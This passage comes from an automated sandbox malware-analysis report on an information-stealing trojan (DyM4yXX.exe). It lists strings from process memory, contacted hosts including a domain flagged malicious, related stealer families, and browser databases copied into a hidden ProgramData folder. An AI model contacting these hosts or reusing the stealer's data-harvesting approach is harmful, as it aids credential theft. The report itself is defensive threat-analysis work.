                                                                                                                                                                                              https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgBitLockerToGo.exe, 00000004.00000002.2396533056.0000000005395000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EB8000.00000004.00000020.00020000.00000000.sdmp, 6fu3ek.4.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, cj58q9.4.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/5901chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://anglebug.com/3965chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://anglebug.com/6439chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/7406chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://www.google.com/searchchrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://anglebug.com/7161chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://drive-autopush.corp.google.com/chrome.exe, 00000005.00000003.2089497215.0000056000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high

                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                142.250.186.46
                                                                                                                                                                                                                		plus.l.google.comUnited States
                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                94.130.191.182
                                                                                                                                                                                                                		r2build.shopGermany
                                                                                                                                                                                                                		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                142.250.185.100
                                                                                                                                                                                                                		www.google.comUnited States
                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                149.154.167.99
                                                                                                                                                                                                                		t.meUnited Kingdom
                                                                                                                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                		unknownReserved
                                                                                                                                                                                                                		unknownunknownfalse

                                                                                                                                                                                                                Private

                                                                                                                                                                                                                IP
                                                                                                                                                                                                                192.168.2.4
                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                Analysis ID:1586677
                                                                                                                                                                                                                Start date and time:2025-01-09 14:00:06 +01:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 5m 59s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Number of analysed new started processes analysed:12
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Sample name:DyM4yXX.exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@24/24@8/7
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 50%
                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                • Successful, ratio: 98%
                                                                                                                                                                                                                • Number of executed functions: 108
                                                                                                                                                                                                                • Number of non-executed functions: 120
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 2.22.50.144, 192.229.221.95, 172.217.18.3, 172.217.23.110, 64.233.166.84, 172.217.16.206, 216.58.206.67, 172.217.18.110, 172.217.16.138, 172.217.18.10, 172.217.16.202, 142.250.185.234, 142.250.185.138, 142.250.186.138, 142.250.185.106, 142.250.185.202, 142.250.186.170, 216.58.212.138, 142.250.185.170, 142.250.181.234, 216.58.206.42, 142.250.186.106, 142.250.74.202, 142.250.184.202, 172.202.163.200, 23.56.254.164, 13.107.253.45
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com
                                                                                                                                                                                                                • Execution Graph export aborted for target DyM4yXX.exe, PID 6448 because there are no executed function
                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                • VT rate limit hit for: DyM4yXX.exe

                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                No simulations

                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                239.255.255.250http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                  Swift-TT680169 Report.svgGet hashmaliciousBranchlock Obfuscator, SVG DropperBrowse
                                                                                                                                                                                                                    http://lynxblog.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      https://identity.thoughtspotlogin.cloud/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        https://booking.pathqerunknowns.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                          colleague[1].htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            http://hikingandadventures.com/inv/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                                              https://identity.login-authenticate.cloud/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                                                                                                  https://www.nwocipuk.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                    http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                                                    http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                    http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                                                    http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                                                    http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/?setln=pl
                                                                                                                                                                                                                                    http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                                                    http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.dog/
                                                                                                                                                                                                                                    LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                    • t.me/cinoshibot
                                                                                                                                                                                                                                    jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                    • t.me/cinoshibot

                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    t.me5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 46.105.202.207
                                                                                                                                                                                                                                    http://t.me/hhackplusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    https://sendbot.me/mousse-w0fysl7Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.26.12.222
                                                                                                                                                                                                                                    ZT0KQ1PC.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    RisingStrip.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 149.154.167.99

                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    TELEGRAMRUJB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    HETZNER-ASDEdigitalisierungskonzept_muster.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 188.40.120.141
                                                                                                                                                                                                                                    digitalisierungskonzept_muster.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 188.40.120.141
                                                                                                                                                                                                                                    https://t.co/qNQo33w8wDGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 148.251.20.70
                                                                                                                                                                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 136.243.64.147
                                                                                                                                                                                                                                    https://qr.me-qr.com/PVhBu5SRGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 78.46.57.143
                                                                                                                                                                                                                                    https://qr.me-qr.com/pt/E9k76ewGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 78.46.57.143
                                                                                                                                                                                                                                    watchdog.elfGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                    • 88.198.117.174
                                                                                                                                                                                                                                    http://hockey30.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 116.202.167.133
                                                                                                                                                                                                                                    https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 116.202.167.133
                                                                                                                                                                                                                                    ZipThis.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 5.161.105.73

                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                    • 94.130.191.182
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                    • 94.130.191.182
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 94.130.191.182
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 94.130.191.182
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 94.130.191.182
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 94.130.191.182
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                                                    • 94.130.191.182
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    2362476847-83854387.07.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 94.130.191.182
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                                                    • 94.130.191.182
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 94.130.191.182
                                                                                                                                                                                                                                    • 149.154.167.99

                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                                    C:\ProgramData\riwlf\2nop8qimg

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    C:\ProgramData\riwlf\3wbaas

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    C:\ProgramData\riwlf\6fu3ek

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):9571
                                                                                                                                                                                                                                    Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                    MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                    SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                    SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                    SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                    C:\ProgramData\riwlf\cj58q9

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    C:\ProgramData\riwlf\djecbi

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):114688
                                                                                                                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    C:\ProgramData\riwlf\f3ekn7q1v

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    C:\ProgramData\riwlf\mgl68g

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):294912
                                                                                                                                                                                                                                    Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                    MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                    SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                    SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                    SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    C:\ProgramData\riwlf\sriwln

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):126976
                                                                                                                                                                                                                                    Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
